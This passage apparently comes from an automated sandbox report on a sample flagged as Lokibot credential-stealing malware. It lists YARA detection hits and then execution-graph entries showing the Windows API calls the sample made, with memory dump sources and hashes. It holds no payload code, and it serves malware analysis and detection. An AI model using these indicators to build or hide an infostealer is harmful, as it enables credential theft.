                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:8.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:102
                                      Total number of Limit Nodes:9
                                      execution_graph 28574 1589418 28578 15894ff 28574->28578 28583 1589510 28574->28583 28575 1589427 28579 1589523 28578->28579 28580 1589533 28579->28580 28588 1589798 28579->28588 28592 1589789 28579->28592 28580->28575 28584 1589523 28583->28584 28585 1589533 28584->28585 28586 1589798 LoadLibraryExW 28584->28586 28587 1589789 LoadLibraryExW 28584->28587 28585->28575 28586->28585 28587->28585 28589 15897ac 28588->28589 28591 15897d1 28589->28591 28596 1588f98 28589->28596 28591->28580 28593 15897ac 28592->28593 28594 1588f98 LoadLibraryExW 28593->28594 28595 15897d1 28593->28595 28594->28595 28595->28580 28597 1589978 LoadLibraryExW 28596->28597 28599 15899f1 28597->28599 28599->28591 28691 158b808 GetCurrentProcess 28692 158b87b 28691->28692 28693 158b882 GetCurrentThread 28691->28693 28692->28693 28694 158b8b8 28693->28694 28695 158b8bf GetCurrentProcess 28693->28695 28694->28695 28696 158b8f5 28695->28696 28697 158b91d GetCurrentThreadId 28696->28697 28698 158b94e 28697->28698 28600 7646e20 28602 7646e41 28600->28602 28601 7646e59 28602->28601 28605 7647920 28602->28605 28608 7645f7c 28605->28608 28609 7647958 DrawTextExW 28608->28609 28611 7646f6c 28609->28611 28612 15840d0 28613 15840e2 28612->28613 28614 15840ee 28613->28614 28618 15841e1 28613->28618 28623 1583c64 28614->28623 28616 158410d 28619 1584205 28618->28619 28627 15842d0 28619->28627 28631 15842e0 28619->28631 28624 1583c6f 28623->28624 28639 15851a4 28624->28639 28626 1586a88 28626->28616 28628 1584307 28627->28628 28629 15843e4 28628->28629 28635 1583de8 28628->28635 28632 1584307 28631->28632 28633 15843e4 28632->28633 28634 1583de8 CreateActCtxA 28632->28634 28634->28633 28636 1585370 CreateActCtxA 28635->28636 28638 1585433 28636->28638 28640 15851af 28639->28640 28643 158581c 28640->28643 28642 1586bbd 28642->28626 28644 1585827 28643->28644 28647 158584c 28644->28647 28646 1586c9a 28646->28642 28648 1585857 28647->28648 28651 158587c 28648->28651 28650 1586d8a 28650->28646 28653 1585887 28651->28653 28652 15874dc 28652->28650 28653->28652 28655 158b532 28653->28655 28656 158b561 28655->28656 28657 158b585 28656->28657 28660 158b6f0 28656->28660 28664 158b6e0 28656->28664 28657->28652 28662 158b6fd 28660->28662 28661 158b737 28661->28657 28662->28661 28668 158ab84 28662->28668 28665 158b6fd 28664->28665 28666 158ab84 LoadLibraryExW 28665->28666 28667 158b737 28665->28667 28666->28667 28667->28657 28669 158ab8f 28668->28669 28671 158c028 28669->28671 28672 158ac6c 28669->28672 28673 158ac77 28672->28673 28674 158587c LoadLibraryExW 28673->28674 28675 158c097 28673->28675 28674->28675 28679 158de28 28675->28679 28685 158de1a 28675->28685 28676 158c0d0 28676->28671 28681 158dea5 28679->28681 28682 158de59 28679->28682 28680 158de65 28680->28676 28681->28676 28682->28680 28683 158e2a8 LoadLibraryExW 28682->28683 28684 158e2a2 LoadLibraryExW 28682->28684 28683->28681 28684->28681 28687 158de59 28685->28687 28688 158dea5 28685->28688 28686 158de65 28686->28676 28687->28686 28689 158e2a8 LoadLibraryExW 28687->28689 28690 158e2a2 LoadLibraryExW 28687->28690 28688->28676 28689->28688 28690->28688 28699 158ba30 DuplicateHandle 28700 158bac6 28699->28700 28701 15896f2 28702 1589738 GetModuleHandleW 28701->28702 28703 1589732 28701->28703 28704 1589765 28702->28704 28703->28702
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31f917635e4f3deb9700b62579d1d3a5f67ea68ad3ff7bc30297f65efb05c28e
                                      • Instruction ID: 2c921185b60c69b44d575f6b1bbd65f3f516e01eeee28e27e89286d5f728012e
                                      • Opcode Fuzzy Hash: 31f917635e4f3deb9700b62579d1d3a5f67ea68ad3ff7bc30297f65efb05c28e
                                      • Instruction Fuzzy Hash: 1CB1E5B0B843558FDB188F74C856ABF76A2AB85710F15803AE507AB3C5DF70AC02CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0002f5df8551966bd5466e0f86fbae7440ede7ca2fe90f47b4028f15ac54948d
                                      • Instruction ID: 4bcf1f531c893e76d7f85ab70b2fe54f0f5212a6661506e748e7169b072af66c
                                      • Opcode Fuzzy Hash: 0002f5df8551966bd5466e0f86fbae7440ede7ca2fe90f47b4028f15ac54948d
                                      • Instruction Fuzzy Hash: 4AA19FB0E052599FCB11CFA9C880AEEFBF2FF8A304F14856AD519A7355C730A945CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0158B868
                                      • GetCurrentThread.KERNEL32 ref: 0158B8A5
                                      • GetCurrentProcess.KERNEL32 ref: 0158B8E2
                                      • GetCurrentThreadId.KERNEL32 ref: 0158B93B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ed9d1a17e9df0f2ab1a3e7db59c52a91df4663baecca650bf72df13b2dc808e8
                                      • Instruction ID: 90708ae3c459d4a9dd3a99945901c8bf79d3c7ab964ea82a936c60c08424c33b
                                      • Opcode Fuzzy Hash: ed9d1a17e9df0f2ab1a3e7db59c52a91df4663baecca650bf72df13b2dc808e8
                                      • Instruction Fuzzy Hash: 215142B0A016898FEB14DFAAD5487EEBBF4BF89304F248859E409BB350C7345945CF26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0158B868
                                      • GetCurrentThread.KERNEL32 ref: 0158B8A5
                                      • GetCurrentProcess.KERNEL32 ref: 0158B8E2
                                      • GetCurrentThreadId.KERNEL32 ref: 0158B93B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ae99c7877eb14de622ee48765ad6d3e0285bd2889ae20678eca8fd4f47473b91
                                      • Instruction ID: 1543706ff00ba9d909e2fe9f089cf10b2e6aa661c6b39850cf0227b7c5d1e5a3
                                      • Opcode Fuzzy Hash: ae99c7877eb14de622ee48765ad6d3e0285bd2889ae20678eca8fd4f47473b91
                                      • Instruction Fuzzy Hash: B55141B0A016898FEB14DFAAD548BAEBBF4FF49304F208459E419BB350C7346944CF26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 38 1585365-1585431 CreateActCtxA 40 158543a-1585494 38->40 41 1585433-1585439 38->41 48 15854a3-15854a7 40->48 49 1585496-1585499 40->49 41->40 50 15854b8 48->50 51 15854a9-15854b5 48->51 49->48 53 15854b9 50->53 51->50 53->53
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585421
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 4db5d709241d2c7f974f03314d25cd7fcf2c83bd730e8c09d6ffddccc220fd2f
                                      • Instruction ID: 74abaf853cefaf8c665a2e9357c3823d6f1064c143e6803627b622b3df07d640
                                      • Opcode Fuzzy Hash: 4db5d709241d2c7f974f03314d25cd7fcf2c83bd730e8c09d6ffddccc220fd2f
                                      • Instruction Fuzzy Hash: AD410271D0066CCEDB24DFA9C884BDDBBB1BF89308F248069D418BB251DB75594ACF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 54 1583de8-1585431 CreateActCtxA 57 158543a-1585494 54->57 58 1585433-1585439 54->58 65 15854a3-15854a7 57->65 66 1585496-1585499 57->66 58->57 67 15854b8 65->67 68 15854a9-15854b5 65->68 66->65 70 15854b9 67->70 68->67 70->70
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585421
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: a0f799045fe979831a051c20fb6a4d855342b02eedf76092ea00bb9a70285bd8
                                      • Instruction ID: 9d0c33d3f1cb773b2586ba9f5848eaf4fd0f48a93f0d7d259159e5ae742d952b
                                      • Opcode Fuzzy Hash: a0f799045fe979831a051c20fb6a4d855342b02eedf76092ea00bb9a70285bd8
                                      • Instruction Fuzzy Hash: 7C41FF71D0462CCFDB24DFA9C844B9EBBB1BF88308F208469D518BB251EB756949CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 71 7645f7c-76479a4 73 76479a6-76479ac 71->73 74 76479af-76479be 71->74 73->74 75 76479c0 74->75 76 76479c3-76479fc DrawTextExW 74->76 75->76 77 7647a05-7647a22 76->77 78 76479fe-7647a04 76->78 78->77
                                      APIs
                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0764793D,?,?), ref: 076479EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.283343833.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7640000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DrawText
                                      • String ID:
                                      • API String ID: 2175133113-0
                                      • Opcode ID: 0ce6f513d376f84480e9ee2ebad860e7a67835ceddd1e30a7cc76afe3b8b89aa
                                      • Instruction ID: 310d588463293e1fdf5935eb92d93649949ef7d7ad3c68784bc8baeb434a7037
                                      • Opcode Fuzzy Hash: 0ce6f513d376f84480e9ee2ebad860e7a67835ceddd1e30a7cc76afe3b8b89aa
                                      • Instruction Fuzzy Hash: 1C31E3B5D003499FCB10CFAAD884AAEBBF5FF48320F14842AE915A7310D774A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 81 158ba28-158bac4 DuplicateHandle 82 158bacd-158baea 81->82 83 158bac6-158bacc 81->83 83->82
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158BAB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 45ecdf78c676c766194680361df5b0d577ab05ea205a2bc6a8935b4e52f32df5
                                      • Instruction ID: 47d61a1427f50f8406b59330512d34d18d2ec654d974afc34d7660d4a372e55e
                                      • Opcode Fuzzy Hash: 45ecdf78c676c766194680361df5b0d577ab05ea205a2bc6a8935b4e52f32df5
                                      • Instruction Fuzzy Hash: 0E21D2B5900249AFDB10CFAAD984AEEBBF4FF48314F14851AE954B7310C774A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 86 158ba30-158bac4 DuplicateHandle 87 158bacd-158baea 86->87 88 158bac6-158bacc 86->88 88->87
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158BAB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 765dd7a7fba98861f23959afc365ad47e446a2dc4b1e0615d662f58187613b75
                                      • Instruction ID: 65ba7e9195de02e1a25e0a34d8512a393f9f28f0a104c7b52a690e760e063ca2
                                      • Opcode Fuzzy Hash: 765dd7a7fba98861f23959afc365ad47e446a2dc4b1e0615d662f58187613b75
                                      • Instruction Fuzzy Hash: C121C4B59002489FDB10CF9AD984ADEFBF8FB48324F14841AE954B7310D374A954DFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 91 1589971-15899b8 92 15899ba-15899bd 91->92 93 15899c0-15899ef LoadLibraryExW 91->93 92->93 94 15899f8-1589a15 93->94 95 15899f1-15899f7 93->95 95->94
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015897D1,00000800,00000000,00000000), ref: 015899E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 1149eb33bc8dddfe9d269a2e107c67b46425a8904e4c81e5213e59b8acef73ed
                                      • Instruction ID: 5377e740292cff2c07243cd2106e392f68c694b778271cccd5fd616a89d7e3fd
                                      • Opcode Fuzzy Hash: 1149eb33bc8dddfe9d269a2e107c67b46425a8904e4c81e5213e59b8acef73ed
                                      • Instruction Fuzzy Hash: 742106B6D002498FDB10CFAAC884AEEFBF4BB88314F15852ED455B7201C774A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 98 1588f98-15899b8 100 15899ba-15899bd 98->100 101 15899c0-15899ef LoadLibraryExW 98->101 100->101 102 15899f8-1589a15 101->102 103 15899f1-15899f7 101->103 103->102
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015897D1,00000800,00000000,00000000), ref: 015899E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: f2f916ad91b9464fe70a32d5329f5634013d3d2753d0b40b7a5929adc5a84b93
                                      • Instruction ID: d5fd795d0f14959ce9ff8a814e61aba0c012ee7d311747b74451dd053ac2db7f
                                      • Opcode Fuzzy Hash: f2f916ad91b9464fe70a32d5329f5634013d3d2753d0b40b7a5929adc5a84b93
                                      • Instruction Fuzzy Hash: C81103B69002499FDB10DF9AC844AEEFBF4FB88318F01842AD555B7300C774A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 106 15896f0-1589730 107 1589738-1589763 GetModuleHandleW 106->107 108 1589732-1589735 106->108 109 158976c-1589780 107->109 110 1589765-158976b 107->110 108->107 110->109
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589756
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: bb80771f6096f43120937457d85ce11570ef5c402fd1029dbd80c84b57b9b9a3
                                      • Instruction ID: bbc95a253f5ca76a3611dae2788151737a099192f2c69a0905e6fd9d443ab7c6
                                      • Opcode Fuzzy Hash: bb80771f6096f43120937457d85ce11570ef5c402fd1029dbd80c84b57b9b9a3
                                      • Instruction Fuzzy Hash: B911D2B5D006498FDB10DF9AC444ADEFBF8AB89224F14841AD529B7600C375A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 112 15896f2-1589730 113 1589738-1589763 GetModuleHandleW 112->113 114 1589732-1589735 112->114 115 158976c-1589780 113->115 116 1589765-158976b 113->116 114->113 116->115
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589756
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 6ecee4b383393605a9b6b26d2c423c0a3e3d2eda571d4ce61c676b6a7c92e6e0
                                      • Instruction ID: 547ded589dd74b2b970ba83e2c0e2ab9c222f622c261897681b380644cab7313
                                      • Opcode Fuzzy Hash: 6ecee4b383393605a9b6b26d2c423c0a3e3d2eda571d4ce61c676b6a7c92e6e0
                                      • Instruction Fuzzy Hash: A511E0B6D006498FDB20DF9AD444BEEFBF4AF89324F14852AD429B7600C375A546CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279421285.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13dd000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e802eb36ccc989e070ff59a8fd4c43309239cc0b84ff8b38dce473a9e9c9865d
                                      • Instruction ID: 9feeaa982485360fcb8a636583020032d7e834cbdaa564360b38536bd089d297
                                      • Opcode Fuzzy Hash: e802eb36ccc989e070ff59a8fd4c43309239cc0b84ff8b38dce473a9e9c9865d
                                      • Instruction Fuzzy Hash: B72148B2504244DFCB01DF54E8C0B2ABF66FB8831CF20C569E9054B286C336D415CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279489541.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13ed000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 784a4625fc3bd689c95ac715805f931bfff87cbfb691a8786b372eaa90518ef7
                                      • Instruction ID: 1301eca2586c7331c011bea3c2647f20e70c7d8f2e4cdc464e574920274701a9
                                      • Opcode Fuzzy Hash: 784a4625fc3bd689c95ac715805f931bfff87cbfb691a8786b372eaa90518ef7
                                      • Instruction Fuzzy Hash: 362125B1504348DFCB15CF64D8C8B26BFA5FB84358F28C569D90A4B786C336DC06CA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279489541.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13ed000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22526138bffe2ac9f7883194b95b9ace9c01ce60df5525f40f0f8974d57dce54
                                      • Instruction ID: a7f93cf4234f61af0291434abee1695d3f47a5aa9cd8bca3ee206b6c341c7603
                                      • Opcode Fuzzy Hash: 22526138bffe2ac9f7883194b95b9ace9c01ce60df5525f40f0f8974d57dce54
                                      • Instruction Fuzzy Hash: 432107B5504348EFDB05DFA4D9C4B2ABBA5FB84328F24C56DE9094B286C336D846CA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279421285.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13dd000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98abe1bd786442cf91278a09081023498efb3f05c37cabdab074b36fb495d528
                                      • Instruction ID: 41fcd10edd1b94ab239298c20e77d81c78bfb181bc1dbbef60760618e57ec019
                                      • Opcode Fuzzy Hash: 98abe1bd786442cf91278a09081023498efb3f05c37cabdab074b36fb495d528
                                      • Instruction Fuzzy Hash: B511D376504284DFCB12CF54D9C4B1ABF72FB84328F24C6A9D8450B657C336D45ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279489541.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13ed000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16c61bb5afbd5972eefcc089b1484a7a4c37a7b643b12c87c30c18ec8848ad14
                                      • Instruction ID: a2ab112822ed2f9e8f2a1f84f2684684b31556b0ac0827638da0c60563bc776f
                                      • Opcode Fuzzy Hash: 16c61bb5afbd5972eefcc089b1484a7a4c37a7b643b12c87c30c18ec8848ad14
                                      • Instruction Fuzzy Hash: 6F118B79904284DFDB12CF54D6C4B15FBB1FB84228F28C6A9D8494B696C33AD44ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279489541.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13ed000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16c61bb5afbd5972eefcc089b1484a7a4c37a7b643b12c87c30c18ec8848ad14
                                      • Instruction ID: a96b3f40e764e1d509328a80bd9da6a18aada5afe381b65508c2e695ad373d56
                                      • Opcode Fuzzy Hash: 16c61bb5afbd5972eefcc089b1484a7a4c37a7b643b12c87c30c18ec8848ad14
                                      • Instruction Fuzzy Hash: E3119075504384DFDB12CF54D5C4B15FFA1FB44318F28C6A9D8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279421285.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13dd000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5190ac589be16d747a3f644cf19909a76d899891a74a61fcc8622ffd65bb3469
                                      • Instruction ID: 3eefc5f632909b3e26a0cd11543403d8ed1d0e7c477549b5e277a4ddbf3f9569
                                      • Opcode Fuzzy Hash: 5190ac589be16d747a3f644cf19909a76d899891a74a61fcc8622ffd65bb3469
                                      • Instruction Fuzzy Hash: 700170730083C49AE7204E66DC8472ABB9CEF4127CF05C099EE085B2C7C3359404C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279421285.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_13dd000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35f599310e9e6306dc29deab3958c87b8295e6808ce3aadc334797970314e80c
                                      • Instruction ID: edab1504a505cf962b5eb195ac8a67d0c68f2672abae5b68834c2023fb1cff2b
                                      • Opcode Fuzzy Hash: 35f599310e9e6306dc29deab3958c87b8295e6808ce3aadc334797970314e80c
                                      • Instruction Fuzzy Hash: B2F0F6724043849EEB218E1ADCC4B62FFA8EF41378F18C05AED084B287C3799844DBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.282155545.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5a60000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4249e4c1f30ae6b665a5c9a5f37e02d5e7a1fc6a95d78a4e92ba320a3363faaa
                                      • Instruction ID: 049c89249156c2c974b6b863d88c89d27053d238e86b8500a9fe07bec32e3e17
                                      • Opcode Fuzzy Hash: 4249e4c1f30ae6b665a5c9a5f37e02d5e7a1fc6a95d78a4e92ba320a3363faaa
                                      • Instruction Fuzzy Hash: E0427C71B042588FDB14DFA8C454BAEBBF2EF88304F15816AD55AEB344DB309D458FA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.279587643.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_hfyhigXccT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
